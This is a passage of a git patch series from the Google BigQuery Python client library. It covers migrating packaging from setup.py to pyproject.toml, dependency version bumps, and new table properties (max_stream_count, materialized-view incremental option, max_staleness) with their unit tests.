< 3.0dev", + "requests >= 2.21.0, < 3.0.0dev", +] +dynamic = ["version"] + +[project.urls] +Repository = "https://github.com/googleapis/python-bigquery" + +[project.optional-dependencies] +# bqstorage had a period where it was a required dependency, and has been +# moved 
back to optional due to bloat. See +# https://github.com/googleapis/python-bigquery/issues/1196 for more background. +bqstorage = [ + "google-cloud-bigquery-storage >= 2.6.0, < 3.0.0dev", + # Due to an issue in pip's dependency resolver, the `grpc` extra is not + # installed, even though `google-cloud-bigquery-storage` specifies it + # as `google-api-core[grpc]`. We thus need to explicitly specify it here. + # See: https://github.com/googleapis/python-bigquery/issues/83 The + # grpc.Channel.close() method isn't added until 1.32.0. + # https://github.com/grpc/grpc/pull/15254 + "grpcio >= 1.47.0, < 2.0dev", + "grpcio >= 1.49.1, < 2.0dev; python_version >= '3.11'", + "pyarrow >= 3.0.0", +] +pandas = [ + "pandas >= 1.1.0", + "pyarrow >= 3.0.0", + "db-dtypes >= 0.3.0, < 2.0.0dev", + "importlib_metadata >= 1.0.0; python_version < '3.8'", +] +ipywidgets = ["ipywidgets >= 7.7.0", "ipykernel >= 6.0.0"] +geopandas = ["geopandas >= 0.9.0, < 1.0dev", "Shapely >= 1.8.4, < 3.0.0dev"] +ipython = ["bigquery-magics >= 0.1.0"] +tqdm = ["tqdm >= 4.7.4, < 5.0.0dev"] +opentelemetry = [ + "opentelemetry-api >= 1.1.0", + "opentelemetry-sdk >= 1.1.0", + "opentelemetry-instrumentation >= 0.20b0", +] +bigquery_v2 = [ + "proto-plus >= 1.22.3, < 2.0.0dev", + "protobuf >= 3.20.2, < 6.0.0dev, != 4.21.0, != 4.21.1, != 4.21.2, != 4.21.3, != 4.21.4, != 4.21.5", # For the legacy proto-based types. +] +all = [ + "google-cloud-bigquery[bqstorage,pandas,ipywidgets,geopandas,ipython,tqdm,opentelemetry,bigquery_v2]", +] + +[tool.setuptools.dynamic] +version = { attr = "google.cloud.bigquery.version.__version__" } + +[tool.setuptools.packages.find] +# Only include packages under the 'google' namespace. Do not include tests, +# benchmarks, etc. +include = ["google*"] diff --git a/setup.py b/setup.py index 617685543..2ad29ecbf 100644 --- a/setup.py +++ b/setup.py @@ -12,131 +12,7 @@ # See the License for the specific language governing permissions and # limitations under the License. 
-import io -import os +import setuptools # type: ignore -import setuptools - -# Package metadata. - -name = "google-cloud-bigquery" -description = "Google BigQuery API client library" - -# Should be one of: -# 'Development Status :: 3 - Alpha' -# 'Development Status :: 4 - Beta' -# 'Development Status :: 5 - Production/Stable' -release_status = "Development Status :: 5 - Production/Stable" -dependencies = [ - "google-api-core[grpc] >= 2.11.1, <3.0.0dev", - "google-auth >= 2.14.1, <3.0.0dev", - "google-cloud-core >= 2.4.1, <3.0.0dev", - "google-resumable-media >= 2.0.0, < 3.0dev", - "packaging >= 20.0.0", - "python-dateutil >= 2.7.3, <3.0dev", - "requests >= 2.21.0, < 3.0.0dev", -] -pyarrow_dependency = "pyarrow >= 3.0.0" -extras = { - # bqstorage had a period where it was a required dependency, and has been - # moved back to optional due to bloat. See - # https://github.com/googleapis/python-bigquery/issues/1196 for more background. - "bqstorage": [ - "google-cloud-bigquery-storage >= 2.6.0, <3.0.0dev", - # Due to an issue in pip's dependency resolver, the `grpc` extra is not - # installed, even though `google-cloud-bigquery-storage` specifies it - # as `google-api-core[grpc]`. We thus need to explicitly specify it here. - # See: https://github.com/googleapis/python-bigquery/issues/83 The - # grpc.Channel.close() method isn't added until 1.32.0. 
- # https://github.com/grpc/grpc/pull/15254 - "grpcio >= 1.47.0, < 2.0dev", - "grpcio >= 1.49.1, < 2.0dev; python_version>='3.11'", - pyarrow_dependency, - ], - "pandas": [ - "pandas>=1.1.0", - pyarrow_dependency, - "db-dtypes>=0.3.0,<2.0.0dev", - "importlib_metadata>=1.0.0; python_version<'3.8'", - ], - "ipywidgets": [ - "ipywidgets>=7.7.0", - "ipykernel>=6.0.0", - ], - "geopandas": ["geopandas>=0.9.0, <1.0dev", "Shapely>=1.8.4, <3.0.0dev"], - "ipython": [ - "bigquery-magics >= 0.1.0", - ], - "tqdm": ["tqdm >= 4.7.4, <5.0.0dev"], - "opentelemetry": [ - "opentelemetry-api >= 1.1.0", - "opentelemetry-sdk >= 1.1.0", - "opentelemetry-instrumentation >= 0.20b0", - ], - "bigquery_v2": [ - "proto-plus >= 1.22.3, <2.0.0dev", - "protobuf>=3.20.2,<6.0.0dev,!=4.21.0,!=4.21.1,!=4.21.2,!=4.21.3,!=4.21.4,!=4.21.5", # For the legacy proto-based types. - ], -} - -all_extras = [] - -for extra in extras: - all_extras.extend(extras[extra]) - -extras["all"] = all_extras - -# Setup boilerplate below this line. - -package_root = os.path.abspath(os.path.dirname(__file__)) - -readme_filename = os.path.join(package_root, "README.rst") -with io.open(readme_filename, encoding="utf-8") as readme_file: - readme = readme_file.read() - -version = {} -with open(os.path.join(package_root, "google/cloud/bigquery/version.py")) as fp: - exec(fp.read(), version) -version = version["__version__"] - -# Only include packages under the 'google' namespace. Do not include tests, -# benchmarks, etc. 
-packages = [ - package - for package in setuptools.find_namespace_packages() - if package.startswith("google") -] - -setuptools.setup( - name=name, - version=version, - description=description, - long_description=readme, - author="Google LLC", - author_email="googleapis-packages@google.com", - license="Apache 2.0", - url="https://github.com/googleapis/python-bigquery", - classifiers=[ - release_status, - "Intended Audience :: Developers", - "License :: OSI Approved :: Apache Software License", - "Programming Language :: Python", - "Programming Language :: Python :: 3", - "Programming Language :: Python :: 3.7", - "Programming Language :: Python :: 3.8", - "Programming Language :: Python :: 3.9", - "Programming Language :: Python :: 3.10", - "Programming Language :: Python :: 3.11", - "Programming Language :: Python :: 3.12", - "Operating System :: OS Independent", - "Topic :: Internet", - ], - platforms="Posix; MacOS X; Windows", - packages=packages, - install_requires=dependencies, - extras_require=extras, - python_requires=">=3.7", - include_package_data=True, - zip_safe=False, -) +setuptools.setup() diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index d6febcfb1..018a096df 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -2011,7 +2011,7 @@ def _make_one( path=None, schema=None, table=None, - **kwargs + **kwargs, ): from google.cloud.bigquery.table import TableReference From 27370b102246fecf2287781714f0544f5bb8ab04 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 15 Nov 2024 19:17:17 +0100 Subject: [PATCH 030/202] chore(deps): update all dependencies (#2038) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe --- samples/geography/requirements.txt 
| 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 1089dc195..30b4a54a1 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -24,7 +24,7 @@ google-crc32c==1.6.0; python_version >= '3.9' google-resumable-media==2.7.2 googleapis-common-protos==1.65.0 grpcio===1.62.2; python_version == '3.7' -grpcio==1.66.1; python_version >= '3.8' +grpcio==1.66.2; python_version >= '3.8' idna==3.10 munch==4.0.0 mypy-extensions==1.0.0 From f2ab8cbfe00d442ad3b40683ecfec320e53b4688 Mon Sep 17 00:00:00 2001 From: Anthonios Partheniou Date: Fri, 15 Nov 2024 13:58:58 -0500 Subject: [PATCH 031/202] fix: Allow geopandas 1.x (#2065) Expand range to avoid diamond dependency issues See https://pypi.org/project/geopandas/1.0.1/ --- pyproject.toml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/pyproject.toml b/pyproject.toml index 44a958323..ecf21d922 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -79,7 +79,7 @@ pandas = [ "importlib_metadata >= 1.0.0; python_version < '3.8'", ] ipywidgets = ["ipywidgets >= 7.7.0", "ipykernel >= 6.0.0"] -geopandas = ["geopandas >= 0.9.0, < 1.0dev", "Shapely >= 1.8.4, < 3.0.0dev"] +geopandas = ["geopandas >= 0.9.0, < 2.0dev", "Shapely >= 1.8.4, < 3.0.0dev"] ipython = ["bigquery-magics >= 0.1.0"] tqdm = ["tqdm >= 4.7.4, < 5.0.0dev"] opentelemetry = [ From 458648f52e71c89e8746f2173a63400dc2553b33 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 15 Nov 2024 21:29:06 +0100 Subject: [PATCH 032/202] chore(deps): update all dependencies (#2064) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * revert * Pin pyparsing for Python 3.7/3.8 * revert * Pin pyarrow for Python 3.8 --------- Co-authored-by: 
Owl Bot Co-authored-by: Anthonios Partheniou Co-authored-by: Chalmer Lowe --- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 26 ++++++++++++++------------ samples/magics/requirements.txt | 6 +++--- samples/notebooks/requirements.txt | 6 +++--- samples/snippets/requirements.txt | 2 +- 5 files changed, 22 insertions(+), 20 deletions(-) diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index 383829d7d..165800741 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.26.0 +google-cloud-bigquery==3.27.0 google-auth-oauthlib==1.2.1 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 30b4a54a1..42f2b5a86 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -2,47 +2,49 @@ attrs==24.2.0 certifi==2024.8.30 cffi===1.15.1; python_version == '3.7' cffi==1.17.1; python_version >= '3.8' -charset-normalizer==3.3.2 +charset-normalizer==3.4.0 click==8.1.7 click-plugins==1.1.1 cligj==0.7.2 dataclasses==0.8; python_version < '3.7' -db-dtypes==1.3.0 +db-dtypes==1.3.1 Fiona===1.9.6; python_version == '3.7' Fiona==1.10.1; python_version >= '3.8' geojson==3.1.0 geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' -google-api-core==2.20.0 -google-auth==2.35.0 -google-cloud-bigquery==3.26.0 -google-cloud-bigquery-storage==2.26.0 +google-api-core==2.23.0 +google-auth==2.36.0 +google-cloud-bigquery==3.27.0 +google-cloud-bigquery-storage==2.27.0 google-cloud-core==2.4.1 google-crc32c===1.5.0; python_version < '3.9' google-crc32c==1.6.0; python_version >= '3.9' google-resumable-media==2.7.2 -googleapis-common-protos==1.65.0 +googleapis-common-protos==1.66.0 grpcio===1.62.2; python_version == '3.7' -grpcio==1.66.2; python_version >= '3.8' +grpcio==1.67.1; python_version >= '3.8' idna==3.10 
munch==4.0.0 mypy-extensions==1.0.0 packaging===24.0; python_version == '3.7' -packaging==24.1; python_version >= '3.8' +packaging==24.2; python_version >= '3.8' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' pandas==2.2.3; python_version >= '3.9' -proto-plus==1.24.0 +proto-plus==1.25.0 pyarrow==12.0.1; python_version == '3.7' -pyarrow==17.0.0; python_version >= '3.8' +pyarrow==17.0.0; python_version == '3.8' +pyarrow==18.0.0; python_version >= '3.9' pyasn1===0.5.1; python_version == '3.7' pyasn1==0.6.1; python_version >= '3.8' pyasn1-modules===0.3.0; python_version == '3.7' pyasn1-modules==0.4.1; python_version >= '3.8' pycparser===2.21; python_version == '3.7' pycparser==2.22; python_version >= '3.8' -pyparsing==3.1.4 +pyparsing===3.1.4; python_version < '3.9' +pyparsing==3.2.0; python_version >= '3.9' python-dateutil==2.9.0.post0 pytz==2024.2 PyYAML===6.0.1; python_version == '3.7' diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 6386fb6d2..543d9a512 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,7 +1,7 @@ bigquery_magics==0.4.0 -db-dtypes==1.3.0 -google.cloud.bigquery==3.26.0 -google-cloud-bigquery-storage==2.26.0 +db-dtypes==1.3.1 +google.cloud.bigquery==3.27.0 +google-cloud-bigquery-storage==2.27.0 ipython===7.31.1; python_version == '3.7' ipython===8.0.1; python_version == '3.8' ipython===8.18.1; python_version >= '3.9' diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 7463e1afc..ca8a0a13e 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,7 +1,7 @@ bigquery-magics==0.4.0 -db-dtypes==1.3.0 -google-cloud-bigquery==3.26.0 -google-cloud-bigquery-storage==2.26.0 +db-dtypes==1.3.1 +google-cloud-bigquery==3.27.0 +google-cloud-bigquery-storage==2.27.0 ipython===7.31.1; python_version == '3.7' ipython===8.0.1; python_version == '3.8' ipython===8.18.1; python_version >= 
'3.9' diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index 65ce0be9f..307ebac24 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.26.0 +google-cloud-bigquery==3.27.0 From fddf2c5608a2d7bfd4981c8d529178070516b5c0 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 15 Nov 2024 22:01:53 +0100 Subject: [PATCH 033/202] chore(deps): update all dependencies (#2068) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * pin pyarrow --------- Co-authored-by: Owl Bot Co-authored-by: Anthonios Partheniou --- samples/geography/requirements.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 42f2b5a86..d08bad258 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -34,8 +34,8 @@ pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' pandas==2.2.3; python_version >= '3.9' proto-plus==1.25.0 -pyarrow==12.0.1; python_version == '3.7' -pyarrow==17.0.0; python_version == '3.8' +pyarrow===12.0.1; python_version == '3.7' +pyarrow===17.0.0; python_version == '3.8' pyarrow==18.0.0; python_version >= '3.9' pyasn1===0.5.1; python_version == '3.7' pyasn1==0.6.1; python_version >= '3.8' From fffe6ba6b271180b0c59c9fbf70feb7d6d322906 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Mon, 18 Nov 2024 17:28:26 +0100 Subject: [PATCH 034/202] chore(deps): update all dependencies (#2070) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See 
https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index d08bad258..438018f88 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -24,7 +24,7 @@ google-crc32c==1.6.0; python_version >= '3.9' google-resumable-media==2.7.2 googleapis-common-protos==1.66.0 grpcio===1.62.2; python_version == '3.7' -grpcio==1.67.1; python_version >= '3.8' +grpcio==1.68.0; python_version >= '3.8' idna==3.10 munch==4.0.0 mypy-extensions==1.0.0 From d4612979b812d2a835e47200f27a87a66bcb856a Mon Sep 17 00:00:00 2001 From: Kien Truong Date: Sat, 23 Nov 2024 04:35:54 +0700 Subject: [PATCH 035/202] feat: support setting max_stream_count when fetching query result (#2051) * feat: support setting max_stream_count when fetching query result Allow user to set max_stream_count when fetching result using BigQuery Storage API with RowIterator's incremental methods: * to_arrow_iterable * to_dataframe_iterable * docs: update docs about max_stream_count for ordered query * fix: add max_stream_count params to _EmptyRowIterator's methods * test: add tests for RowIterator's max_stream_count parameter * docs: add notes on valid max_stream_count range in docstring * use a different way to iterate result --------- Co-authored-by: Lingqing Gan --- google/cloud/bigquery/table.py | 44 +++++++++++++++++++++ tests/unit/test_table.py | 70 ++++++++++++++++++++++++++++++++++ 2 files changed, 114 insertions(+) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index faf827be4..dcaf377e3 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1812,6 +1812,7 @@ def to_arrow_iterable( self, bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, max_queue_size: int = 
_pandas_helpers._MAX_QUEUE_SIZE_DEFAULT, # type: ignore + max_stream_count: Optional[int] = None, ) -> Iterator["pyarrow.RecordBatch"]: """[Beta] Create an iterable of class:`pyarrow.RecordBatch`, to process the table as a stream. @@ -1836,6 +1837,22 @@ def to_arrow_iterable( created by the server. If ``max_queue_size`` is :data:`None`, the queue size is infinite. + max_stream_count (Optional[int]): + The maximum number of parallel download streams when + using BigQuery Storage API. Ignored if + BigQuery Storage API is not used. + + This setting also has no effect if the query result + is deterministically ordered with ORDER BY, + in which case, the number of download stream is always 1. + + If set to 0 or None (the default), the number of download + streams is determined by BigQuery the server. However, this behaviour + can require a lot of memory to store temporary download result, + especially with very large queries. In that case, + setting this parameter value to a value > 0 can help + reduce system resource consumption. + Returns: pyarrow.RecordBatch: A generator of :class:`~pyarrow.RecordBatch`. @@ -1852,6 +1869,7 @@ def to_arrow_iterable( preserve_order=self._preserve_order, selected_fields=self._selected_fields, max_queue_size=max_queue_size, + max_stream_count=max_stream_count, ) tabledata_list_download = functools.partial( _pandas_helpers.download_arrow_row_iterator, iter(self.pages), self.schema @@ -1978,6 +1996,7 @@ def to_dataframe_iterable( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, dtypes: Optional[Dict[str, Any]] = None, max_queue_size: int = _pandas_helpers._MAX_QUEUE_SIZE_DEFAULT, # type: ignore + max_stream_count: Optional[int] = None, ) -> "pandas.DataFrame": """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -2008,6 +2027,22 @@ def to_dataframe_iterable( .. 
versionadded:: 2.14.0 + max_stream_count (Optional[int]): + The maximum number of parallel download streams when + using BigQuery Storage API. Ignored if + BigQuery Storage API is not used. + + This setting also has no effect if the query result + is deterministically ordered with ORDER BY, + in which case, the number of download stream is always 1. + + If set to 0 or None (the default), the number of download + streams is determined by BigQuery the server. However, this behaviour + can require a lot of memory to store temporary download result, + especially with very large queries. In that case, + setting this parameter value to a value > 0 can help + reduce system resource consumption. + Returns: pandas.DataFrame: A generator of :class:`~pandas.DataFrame`. @@ -2034,6 +2069,7 @@ def to_dataframe_iterable( preserve_order=self._preserve_order, selected_fields=self._selected_fields, max_queue_size=max_queue_size, + max_stream_count=max_stream_count, ) tabledata_list_download = functools.partial( _pandas_helpers.download_dataframe_row_iterator, @@ -2690,6 +2726,7 @@ def to_dataframe_iterable( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, dtypes: Optional[Dict[str, Any]] = None, max_queue_size: Optional[int] = None, + max_stream_count: Optional[int] = None, ) -> Iterator["pandas.DataFrame"]: """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -2705,6 +2742,9 @@ def to_dataframe_iterable( max_queue_size: Ignored. Added for compatibility with RowIterator. + max_stream_count: + Ignored. Added for compatibility with RowIterator. + Returns: An iterator yielding a single empty :class:`~pandas.DataFrame`. @@ -2719,6 +2759,7 @@ def to_arrow_iterable( self, bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, max_queue_size: Optional[int] = None, + max_stream_count: Optional[int] = None, ) -> Iterator["pyarrow.RecordBatch"]: """Create an iterable of pandas DataFrames, to process the table as a stream. 
@@ -2731,6 +2772,9 @@ def to_arrow_iterable( max_queue_size: Ignored. Added for compatibility with RowIterator. + max_stream_count: + Ignored. Added for compatibility with RowIterator. + Returns: An iterator yielding a single empty :class:`~pyarrow.RecordBatch`. """ diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 018a096df..d81ad2dca 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -5822,3 +5822,73 @@ def test_table_reference_to_bqstorage_v1_stable(table_path): for klass in (mut.TableReference, mut.Table, mut.TableListItem): got = klass.from_string(table_path).to_bqstorage() assert got == expected + + +@pytest.mark.parametrize("preserve_order", [True, False]) +def test_to_arrow_iterable_w_bqstorage_max_stream_count(preserve_order): + pytest.importorskip("pandas") + pytest.importorskip("google.cloud.bigquery_storage") + from google.cloud.bigquery import schema + from google.cloud.bigquery import table as mut + from google.cloud import bigquery_storage + + bqstorage_client = mock.create_autospec(bigquery_storage.BigQueryReadClient) + session = bigquery_storage.types.ReadSession() + bqstorage_client.create_read_session.return_value = session + + row_iterator = mut.RowIterator( + _mock_client(), + api_request=None, + path=None, + schema=[ + schema.SchemaField("colA", "INTEGER"), + ], + table=mut.TableReference.from_string("proj.dset.tbl"), + ) + row_iterator._preserve_order = preserve_order + + max_stream_count = 132 + result_iterable = row_iterator.to_arrow_iterable( + bqstorage_client=bqstorage_client, max_stream_count=max_stream_count + ) + list(result_iterable) + bqstorage_client.create_read_session.assert_called_once_with( + parent=mock.ANY, + read_session=mock.ANY, + max_stream_count=max_stream_count if not preserve_order else 1, + ) + + +@pytest.mark.parametrize("preserve_order", [True, False]) +def test_to_dataframe_iterable_w_bqstorage_max_stream_count(preserve_order): + pytest.importorskip("pandas") + 
pytest.importorskip("google.cloud.bigquery_storage") + from google.cloud.bigquery import schema + from google.cloud.bigquery import table as mut + from google.cloud import bigquery_storage + + bqstorage_client = mock.create_autospec(bigquery_storage.BigQueryReadClient) + session = bigquery_storage.types.ReadSession() + bqstorage_client.create_read_session.return_value = session + + row_iterator = mut.RowIterator( + _mock_client(), + api_request=None, + path=None, + schema=[ + schema.SchemaField("colA", "INTEGER"), + ], + table=mut.TableReference.from_string("proj.dset.tbl"), + ) + row_iterator._preserve_order = preserve_order + + max_stream_count = 132 + result_iterable = row_iterator.to_dataframe_iterable( + bqstorage_client=bqstorage_client, max_stream_count=max_stream_count + ) + list(result_iterable) + bqstorage_client.create_read_session.assert_called_once_with( + parent=mock.ANY, + read_session=mock.ANY, + max_stream_count=max_stream_count if not preserve_order else 1, + ) From 9e19ecd9c3b24c6132203859f2b6f6a885e978a9 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 26 Nov 2024 19:16:56 +0100 Subject: [PATCH 036/202] chore(deps): update all dependencies (#2078) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 438018f88..edf5a24b6 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -36,7 +36,7 @@ pandas==2.2.3; python_version >= '3.9' proto-plus==1.25.0 pyarrow===12.0.1; python_version == '3.7' pyarrow===17.0.0; python_version == '3.8' -pyarrow==18.0.0; python_version >= '3.9' 
+pyarrow==18.1.0; python_version >= '3.9' pyasn1===0.5.1; python_version == '3.7' pyasn1==0.6.1; python_version >= '3.8' pyasn1-modules===0.3.0; python_version == '3.7' From 3359ef37b90243bea2d9e68bb996fe5d736f304c Mon Sep 17 00:00:00 2001 From: Yu Ishikawa Date: Wed, 4 Dec 2024 22:24:15 +0900 Subject: [PATCH 037/202] feat: add property for `allowNonIncrementalDefinition` for materialized view (#2084) * feat: property for `allowNonIncrementalDefinition` materialized view Signed-off-by: Yu Ishikawa format Signed-off-by: Yu Ishikawa * Update tests/unit/test_table.py Co-authored-by: Chalmer Lowe * Update google/cloud/bigquery/table.py Co-authored-by: Chalmer Lowe --------- Signed-off-by: Yu Ishikawa Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/table.py | 23 +++++++++++++++++++++++ tests/unit/test_table.py | 10 ++++++++++ 2 files changed, 33 insertions(+) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index dcaf377e3..38542023b 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -390,6 +390,7 @@ class Table(_TableBase): "mview_last_refresh_time": ["materializedView", "lastRefreshTime"], "mview_query": "materializedView", "mview_refresh_interval": "materializedView", + "mview_allow_non_incremental_definition": "materializedView", "num_bytes": "numBytes", "num_rows": "numRows", "partition_expiration": "timePartitioning", @@ -928,6 +929,28 @@ def mview_refresh_interval(self, value): refresh_interval_ms, ) + @property + def mview_allow_non_incremental_definition(self): + """Optional[bool]: This option declares the intention to construct a + materialized view that isn't refreshed incrementally. + The default value is :data:`False`. 
+ """ + api_field = self._PROPERTY_TO_API_FIELD[ + "mview_allow_non_incremental_definition" + ] + return _helpers._get_sub_prop( + self._properties, [api_field, "allowNonIncrementalDefinition"] + ) + + @mview_allow_non_incremental_definition.setter + def mview_allow_non_incremental_definition(self, value): + api_field = self._PROPERTY_TO_API_FIELD[ + "mview_allow_non_incremental_definition" + ] + _helpers._set_sub_prop( + self._properties, [api_field, "allowNonIncrementalDefinition"], value + ) + @property def streaming_buffer(self): """google.cloud.bigquery.StreamingBuffer: Information about a table's diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index d81ad2dca..ff0593470 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -1050,6 +1050,16 @@ def test_mview_refresh_interval(self): table.mview_refresh_interval = None self.assertIsNone(table.mview_refresh_interval) + def test_mview_allow_non_incremental_definition(self): + table = self._make_one() + self.assertIsNone(table.mview_allow_non_incremental_definition) + table.mview_allow_non_incremental_definition = True + self.assertTrue(table.mview_allow_non_incremental_definition) + table.mview_allow_non_incremental_definition = False + self.assertFalse(table.mview_allow_non_incremental_definition) + table.mview_allow_non_incremental_definition = None + self.assertIsNone(table.mview_allow_non_incremental_definition) + def test_from_string(self): cls = self._get_target_class() got = cls.from_string("string-project.string_dataset.string_table") From 729322c2288a30464f2f135ba18b9c4aa7d2f0da Mon Sep 17 00:00:00 2001 From: Yu Ishikawa Date: Sat, 7 Dec 2024 05:56:34 +0900 Subject: [PATCH 038/202] feat: add property for maxStaleness in table definitions (#2087) * feat: add property for maxStaleness in table definitions Signed-off-by: Yu Ishikawa * Update google/cloud/bigquery/table.py --------- Signed-off-by: Yu Ishikawa Co-authored-by: Lingqing Gan --- google/cloud/bigquery/table.py | 
35 +++++++++++++++++++++++++++ tests/unit/test_table.py | 43 ++++++++++++++++++++++++++++++++++ 2 files changed, 78 insertions(+) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 38542023b..80ab330ba 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -407,6 +407,7 @@ class Table(_TableBase): "view_query": "view", "require_partition_filter": "requirePartitionFilter", "table_constraints": "tableConstraints", + "max_staleness": "maxStaleness", } def __init__(self, table_ref, schema=None) -> None: @@ -1115,6 +1116,40 @@ def __repr__(self): def __str__(self): return f"{self.project}.{self.dataset_id}.{self.table_id}" + @property + def max_staleness(self): + """Union[str, None]: The maximum staleness of data that could be returned when the table is queried. + + Staleness encoded as a string encoding of sql IntervalValue type. + This property is optional and defaults to None. + + According to the BigQuery API documentation, maxStaleness specifies the maximum time + interval for which stale data can be returned when querying the table. + It helps control data freshness in scenarios like metadata-cached external tables. + + Returns: + Optional[str]: A string representing the maximum staleness interval + (e.g., '1h', '30m', '15s' for hours, minutes, seconds respectively). + """ + return self._properties.get(self._PROPERTY_TO_API_FIELD["max_staleness"]) + + @max_staleness.setter + def max_staleness(self, value): + """Set the maximum staleness for the table. + + Args: + value (Optional[str]): A string representing the maximum staleness interval. + Must be a valid time interval string. + Examples include '1h' (1 hour), '30m' (30 minutes), '15s' (15 seconds). + + Raises: + ValueError: If the value is not None and not a string. 
+ """ + if value is not None and not isinstance(value, str): + raise ValueError("max_staleness must be a string or None") + + self._properties[self._PROPERTY_TO_API_FIELD["max_staleness"]] = value + class TableListItem(_TableBase): """A read-only table resource from a list operation. diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index ff0593470..3824da226 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -1475,6 +1475,49 @@ def test___str__(self): table1 = self._make_one(TableReference(dataset, "table1")) self.assertEqual(str(table1), "project1.dataset1.table1") + def test_max_staleness_getter(self): + """Test getting max_staleness property.""" + dataset = DatasetReference("test-project", "test_dataset") + table_ref = dataset.table("test_table") + table = self._make_one(table_ref) + # Initially None + self.assertIsNone(table.max_staleness) + # Set max_staleness using setter + table.max_staleness = "1h" + self.assertEqual(table.max_staleness, "1h") + + def test_max_staleness_setter(self): + """Test setting max_staleness property.""" + dataset = DatasetReference("test-project", "test_dataset") + table_ref = dataset.table("test_table") + table = self._make_one(table_ref) + # Set valid max_staleness + table.max_staleness = "30m" + self.assertEqual(table.max_staleness, "30m") + # Set to None + table.max_staleness = None + self.assertIsNone(table.max_staleness) + + def test_max_staleness_setter_invalid_type(self): + """Test setting max_staleness with an invalid type raises ValueError.""" + dataset = DatasetReference("test-project", "test_dataset") + table_ref = dataset.table("test_table") + table = self._make_one(table_ref) + # Try setting invalid type + with self.assertRaises(ValueError): + table.max_staleness = 123 # Not a string + + def 